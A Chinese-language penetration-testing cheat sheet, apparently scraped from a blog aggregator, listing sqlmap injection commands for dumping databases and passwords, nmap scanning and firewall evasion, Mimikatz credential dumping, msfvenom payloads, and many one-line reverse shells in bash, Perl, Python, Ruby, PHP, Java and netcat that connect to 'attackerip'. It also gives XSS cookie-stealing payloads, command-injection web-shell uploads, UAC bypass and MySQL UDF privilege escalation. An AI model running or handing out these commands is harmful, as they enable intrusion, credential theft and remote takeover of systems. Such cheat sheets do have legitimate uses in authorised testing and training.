sqlmap命令
-u #注入點 -f #指紋判別數據庫類型 -b #獲取數據庫版本信息 -p #指定可測試的參數(?page=1&id=2 -p 「page,id」) -D 「」 #指定數據庫名 -T 「」 #指定表名 -C 「」 #指定字段 -s 「」 #保存注入過程到一個文件,還可中斷,下次恢復在注入(保存:-s 「xx.log」 恢復:-s 「xx.log」 –resume) –columns #列出字段 –current-user #獲取當前用戶名稱 –current-db #獲取當前數據庫名稱 –users #列數據庫全部用戶 –passwords #數據庫用戶全部密碼 –privileges #查看用戶權限(–privileges -U root) -U #指定數據庫用戶 –dbs #列出全部數據庫 –tables -D 「」 #列出指定數據庫中的表 –columns -T 「user」 -D 「mysql」 #列出mysql數據庫中的user表的全部字段 –dump-all #列出全部數據庫全部表 –exclude-sysdbs #只列出用戶本身新建的數據庫和表 –dump -T 「」 -D 「」 -C 「」 #列出指定數據庫的表的字段的數據(–dump -T users -D master -C surname) –dump -T 「」 -D 「」 –start 2 –top 4 # 列出指定數據庫的表的2-4字段的數據 –dbms #指定數據庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) –os #指定系統(Linux,Windows) -v #詳細的等級(0-6) 0:只顯示Python的回溯,錯誤和關鍵消息。 1:顯示信息和警告消息。 2:顯示調試消息。 3:有效載荷注入。 4:顯示HTTP請求。 5:顯示HTTP響應頭。 6:顯示HTTP響應頁面的內容 –privileges #查看權限 –is-dba #是不是數據庫管理員 –roles #枚舉數據庫用戶角色 –udf-inject #導入用戶自定義函數(獲取系統權限) –union-check #是否支持union 注入 –union-cols #union 查詢表記錄 –union-test #union 語句測試 –union-use #採用union 注入 –union-tech orderby #union配合order by –method 「POST」 –data 「」 #POST方式提交數據(–method 「POST」 –data 「page=1&id=2″) –cookie 「用;號分開」 #cookie注入(–cookies=」PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low」) –referer 「」 #使用referer欺騙(–referer 「http://www.baidu.com」) –user-agent 「」 #自定義user-agent –proxy 「http://127.0.0.1:8118″ #代理注入 –string 「」 #指定關鍵詞 –threads #採用多線程(–threads 3) –sql-shell #執行指定sql命令 –sql-query #執行指定的sql語句(–sql-query 「SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ ) –file-read #讀取指定文件 –file-write #寫入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;將本地的test.txt文件寫入到目標的1.txt) –file-dest #要寫入的文件絕對路徑 –os-cmd=id #執行系統命令 –os-shell #系統交互shell –os-pwn #反彈shell(–os-pwn –msf-path=/opt/framework/msf3/) –msf-path= #matesploit絕對路徑(–msf-path=/opt/framework/msf3/) –os-smbrelay # –os-bof # –reg-read #讀取win系統註冊表 –priv-esc # –time-sec= #延遲設置 默認–time-sec=5 爲5秒 -p 「user-agent」 –user-agent 「sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)」 #指定user-agent注入 –eta #盲注 /pentest/database/sqlmap/txt/ common-columns.txt 字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.txt wordlist.txt 經常使用語句 1. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0 2. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –passwords -U root –union-use -v 2 3. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –dump -T users -C username -D userdb –start 2 –stop 3 -v 2 4. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –dump -C 「user,pass」 -v 1 –exclude-sysdbs 5. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –sql-shell -v 2 6. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –file-read 「c:\boot.ini」 -v 2 7. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –file-write /test/test.txt –file-dest /var/www/html/1.txt -v 2 8. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –os-cmd 「id」 -v 1 9. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –os-shell –union-use -v 2 10. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –os-pwn –msf-path=/opt/framework/msf3 –priv-esc -v 1 11. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –os-pwn –msf-path=/opt/framework/msf3 -v 1 12. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –os-bof –msf-path=/opt/framework/msf3 -v 1 13. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 –reg-add –reg-key=」HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap」 –reg-value=Test –reg-type=REG_SZ –reg-data=1 14. ./sqlmap.py -u http://www.xxx.com/ test.php?p=2 -b –eta 15. ./sqlmap.py -u 「http://www.xxx.com/ sqlmap/mysql/get_str_brackets.php?id=1″ -p id –prefix 「‘)」 –suffix 「AND (‘abc’='abc」 16. ./sqlmap.py -u 「http://www.xxx.com/ sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred 「testuser:testpass」 17. ./sqlmap.py -l burp.log –scope=」(www)?\.target\.(com|net|org)」 18. ./sqlmap.py -u 「http://www.xxx.com/ sqlmap/mysql/get_int.php?id=1″ –tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 19. ./sqlmap.py -u 「http://www.xxx.com/ sqlmap/mssql/get_int.php?id=1″ –sql-query 「SELECT ‘foo’」 -v 1 20. ./sqlmap.py -u 「http://www.xxx.com/ mysql/get_int_4.php?id=1″ –common-tables -D testdb –banner 簡單的注入流程 1.讀取數據庫版本,當前用戶,當前數據庫 sqlmap -u http://www.xxx.com/ test.php?p=2 -f -b –current-user –current-db -v 1 2.判斷當前數據庫用戶權限 sqlmap -u http://www.xxx.com/ test.php?p=2 –privileges -U 用戶名 -v 1 sqlmap -u http://www.xxx.com/ test.php?p=2 –is-dba -U 用戶名 -v 1 3.讀取全部數據庫用戶或指定數據庫用戶的密碼 sqlmap -u http://www.xxx.com/ test.php?p=2 –users –passwords -v 2 sqlmap -u http://www.xxx.com/ test.php?p=2 –passwords -U root -v 2 4.獲取全部數據庫 sqlmap -u http://www.xxx.com/ test.php?p=2 –dbs -v 2 5.獲取指定數據庫中的全部表 sqlmap -u http://www.xxx.com/ test.php?p=2 –tables -D mysql -v 2 6.獲取指定數據庫名中指定表的字段 sqlmap -u http://www.xxx.com/ test.php?p=2 –columns -D mysql -T users -v 2 7.獲取指定數據庫名中指定表中指定字段的數據 sqlmap -u http://www.xxx.com/ test.php?p=2 –dump -D mysql -T users -C 「username,password」 -s 「sqlnmapdb.log」 -v 2 8.file-read讀取web文件 sqlmap -u http://www.xxx.com/ test.php?p=2 –file-read 「/etc/passwd」 -v 2 9.file-write寫入文件到web sqlmap -u http://www.xxx.com/ test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
nmap掃描445端口開放的主機命令:nmap -sS -p 445 -oG - 目標IP/24
存入xml文件命令:nmap -sS -p 445 -oG - 目標IP/24 -oX nmap_info.xml,結果會輸出到XML文件:nmap_info.xml。
存入nmap文件命令:nmap -sS -p 445 -oG - 目標IP/24 -oN nmap_info.nmap,結果會輸出到普通文件:nmap_info.nmap。
你在哪一個目錄執行了nmap的目錄,它就會在哪一個目錄。
對 mysql 進行空密碼的掃描
> nmap -p3306 --script=mysql-empty-password.nse 192.168.100.1/24
對 mysql 弱口令暴力破解javascript
> nmap -p3306 --script=mysql-brute --script-args=userdb=user.txt,passdb=password.txt 127.0.0.1
nmap命令
# 適用全部大小網絡最好的 nmap 掃描策略 # 主機發現,生成存活主機列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口發現,發現大部分經常使用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口發現,發現所有端口,但 UDP 端口的掃描會很是慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 顯示 TCP\UDP 端口 $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}' # 偵測服務版本 $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # 掃作系統掃描 $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # 系統和服務檢測 $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt躲避防火牆
# 分段 $ nmap -f # 修改默認 MTU 大小,但必須爲 8 的倍數(8,16,24,32 等等) $ nmap --mtu 24 # 生成隨機數量的欺騙 $ nmap -D RND:10 [target] # 手動指定欺騙使用的 IP $ nmap -D decoy1,decoy2,decoy3 etc. # 僵屍網絡掃描, 首先須要找到僵屍網絡的IP $ nmap -sI [Zombie IP] [Target IP] # 指定源端口號 $ nmap --source-port 80 IP # 在每一個掃描數據包後追加隨機數量的數據 $ nmap --data-length 25 IP # MAC 地址欺騙,能夠生成不一樣主機的 MAC 地址 $ nmap --spoof-mac Dell/Apple/3Com IP進行 Web 漏洞掃描
cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
Meterpreter 端口轉發
轉發遠程端口到目標地址
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP關閉 Windows 防火牆
netsh firewall set opmode disable使用 Mimikatz
獲取 Windows 明文用戶名密碼php
git clone https://github.com/gentilkiwi/mimikatz.git privilege::debug sekurlsa::logonPasswords full使用 NC 在 Windows 上反彈 shell
c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc example.com 80 -e cmd.exe nc -lp 80 nc -lp 31337 -e /bin/bash nc 192.168.0.10 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000Kali 下編譯 Windows Exploit
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe使用 metasploit 進行穿透
route add X.X.X.X 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E 或者 # https://www.offensive-security.com/metasploit-unleashed/pivoting/ meterpreter > ipconfig IP Address : 10.1.13.3 meterpreter > run autoroute -s 10.1.13.0/24 meterpreter > run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter > Ctrl+Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit meterpreter > ipconfig IP Address : 10.1.13.2MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
MSF 生成在 Linux 下反彈的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反彈 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
MSF 生成反彈 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反彈 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
MSF 生成反彈 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
MSF 生成反彈 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php add <?php at the beginning perl -i~ -0777pe's/^/<?php \n/' shell.php
MSF 生成反彈 Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
Linux 經常使用安全命令
# 使用 uid 查找對應的程序 find / -uid 0 -perm -4000 # 查找哪裏擁有寫權限 find / -perm -o=w # 查找名稱中包含點和空格的文件 find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print # 查找不屬於任何人的文件 find / -nouser # 查找未連接的文件 lsof +L1 # 獲取進程打開端口的信息 lsof -i # 看看 ARP 表中是否有奇怪的東西 arp -a # 查看全部帳戶 getent passwd # 查看全部用戶組 getent group # 列舉全部用戶的 crontabs for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done # 生成隨機密碼 cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4 # 查找全部不可修改的文件 find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’ # 使文件不可修改 chattr -i file
Windows 緩衝區溢出利用命令
msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_) # 經常使用命令: pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode ) !pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh !mona config -set workingfolder C:\Mona\%p !mona config -get workingfolder !mona mod !mona bytearray -b "\x00\x0a" !mona pc 5000 !mona po EIP !mona suggest BASH 反彈 Shell
bash -i >& /dev/tcp/X.X.X.X/443 0>&1 exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
PERL 反彈 Shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' # Win 平臺 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
RUBY 反彈 Shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' # Win 平臺 ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PYTHON 反彈 Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP 反彈 Shell
php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
JAVA 反彈 Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
NETCAT 反彈 Shell
nc -e /bin/sh attackerip 4444 nc -e /bin/sh 192.168.37.10 443 # 若是 -e 參數被禁用,能夠嘗試如下命令 # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe /bin/sh | nc attackerip 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/ # 若是你安裝錯了 netcat 的版本,請嘗試如下命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
TELNET 反彈 Shell
# 若是 netcat 不可用或者 /dev/tcp mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
XTERM 反彈 Shell
# http://baike.baidu.com/view/418628.htm # 開啓 X 服務器 (:1 – 監聽 TCP 端口 6001) apt-get install xnest Xnest :1 # 記得受權來自目標 IP 的鏈接 xterm -display 127.0.0.1:1 # 受權訪問 xhost +targetip # 在目標機器上鍊接回咱們的 X 服務器 xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 or $ DISPLAY=attackerip:0 xterm XSS 備忘錄
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet ("< iframes > src=http://IP:PORT </ iframes >") <script>document.location=http://IP:PORT</script> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";!–"<XSS>=&amp;{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>""> <IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;> <IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041> <IMG SRC="jav ascript:alert('XSS');"> perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> (">< iframes http://google.com < iframes >) <BODY BACKGROUND="javascript:alert('XSS')"> <FRAMESET><FRAME SRC=」javascript:alert('XSS');"></FRAMESET> "><script >alert(document.cookie)</script> %253cscript%253ealert(document.cookie)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E <img src=asdf onerror=alert(document.cookie)> 使用非交互 Shell 打入內網
# 生成 shell 使用的 ssh 密鑰 $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami" $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" " $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" # 增長用戶 tempuser $ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 /home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh # 反彈 ssh shell $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
利用 POST 遠程命令執行獲取 Shell
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl http://victum.tk/shell.php?cmd=id # 在服務器上下載 shell (phpshell.php) http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27 # 運行 nc 並執行 phpshell.php attacker:~$ nc -nvlp 1337
以管理員身份在 Win7 上反彈具備系統權限的 Shell
msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe # 顯示帳戶配置 net user <login> # Kali 上下載 psexec https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx # 使用 powershell 腳本上傳 psexec.exe 到目標機器 echo $client = New-Object System.Net.WebClient > script.ps1 echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1 echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1 # 使用 powershell 腳本上傳 danger.exe 到目標機器 echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1 echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1 # 使用預編譯的二進制文件繞過 UAC: https://github.com/hfiref0x/UACME # 使用 powershell 腳本上傳 https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe 到目標機器 echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1 echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1 # 在 Kali 上建立監聽 nc -lvp 4444 # 以系統權限使用 Akagi64 運行 danger.exe Akagi64.exe 1 C:\Users\User\Desktop\danger.exe # 在 Kali 上建立監聽 nc -lvp 4444 # 下一步就會反彈給咱們一個提過權的 shell # 以系統權限使用 PsExec 運行 danger.exe psexec.exe –i –d –accepteula –s danger.exe
以普通用戶身份在 Win7 上反彈具備系統權限的 Shell
https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051 https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://www.exploit-db.com/exploits/37049/ # 查找目標機器是否安裝了補丁,輸入以下命令 wmic qfe get wmic qfe | find "3057191" # 上傳編譯後的利用程序並運行它 https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe # 默認狀況下其會以系統權限執行 cmd.exe,但咱們須要改變源代碼以運行咱們上傳的 danger.exe # https://github.com/hfiref0x/CVE-2015-1701 下載它並定位到 "main.c" # 使用 wce.exe 獲取已登陸用戶的明文帳號密碼 http://www.ampliasecurity.com/research/windows-credentials-editor/ wce -w # 使用 pwdump7 獲取其餘用戶的密碼哈希值 http://www.heise.de/download/pwdump.html # we can try online hash cracking tools such crackstation.net
MS08-067 – 不使用 Metasploit
$ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205 $ searchsploit ms08-067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
經過 MySQL Root 帳戶實現提權
# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu) $ wget 0xdeadbeef.info/exploits/raptor_udf2.c $ gcc -g -c raptor_udf2.c $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/home/user/raptor_udf2.so')); mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out'); user:~$ su - Password: user:~# whoami root root:~# id uid=0(root) gid=0(root) groups=0(root)
使用 LD_PRELOAD 注入程序
$ wget https://github.com/jivoi/pentest/ldpreload_shell.c $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
針對 OpenSSH 用戶進行枚舉時序攻擊
注:枚舉時序攻擊(「Enumeration Timing Attack」)屬於側信道攻擊/旁路攻擊(Side Channel Attack),側信道攻擊是指利用信道外的信息,好比加解密的速度/加解密時芯片引腳的電壓/密文傳輸的流量和途徑等進行攻擊的方式,一個詞形容就是「旁敲側擊」。–參考自 shotgun 在知乎上的解釋。css
osueta 是一個用於對 OpenSSH 進行時序攻擊的 python2 腳本,其能夠利用時序攻擊枚舉 OpenSSH 用戶名,並在必定條件下能夠對 OpenSSH 服務器進行 DOS 攻擊。html
# https://github.com/c0r3dump3d/osueta $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
使用 ReDuh 構造合法的 HTTP 請求以創建 TCP 通道
注: ReDuh 是一個經過 HTTP 協議創建隧道傳輸各類其餘數據的工具。其能夠把內網服務器的端口經過 http/https 隧道轉發到本機,造成一個連通迴路。用於目標服務器在內網或作了端口策略的狀況下鏈接目標服務器內部開放端口。java
對了親~ReDuh-Gui 號稱端口轉發神器哦。python
# https://github.com/sensepost/reDuh # 步驟 1 # 上傳 reDuh.jsp 目標服務器 $ http://192.168.10.50/uploads/reDuh.jsp # 步驟 2 # 在本機運行 reDuhClient $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp # 步驟 3 # 使用 nc 鏈接管理端口 $ nc -nvv 127.0.0.1 1010 # 步驟 4 # 使用隧道轉發本地端口到遠程目標端口 [createTunnel] 7777:172.16.0.4:3389 # 步驟 5 # 使用 RDP 鏈接遠程 $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
注:更多請看freebuf(http://www.freebuf.com/sectool/105524.html)
相關文章
- 1. sqlmap命令2
- 2. Sqlmap命令講解
- 3. SQLmap命令詳解
- 4. sqlmap命令手冊
- 5. SQLMAP 命令詳解
- 6. sqlmap的命令總結
- 7. sqlmap經常使用命令
- 8. SQLmap命令的介紹
- 9. sqlmap幾個基本命令
- 10. sql注入工具:sqlmap命令
- 更多相關文章...
- • Docker info 命令 - Docker命令大全
- • Docker version 命令 - Docker命令大全
- • Docker 清理命令
- • Composer 安裝與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. sqlmap命令2
- 2. Sqlmap命令講解
- 3. SQLmap命令詳解
- 4. sqlmap命令手冊
- 5. SQLMAP 命令詳解
- 6. sqlmap的命令總結
- 7. sqlmap經常使用命令
- 8. SQLmap命令的介紹
- 9. sqlmap幾個基本命令
- 10. sql注入工具:sqlmap命令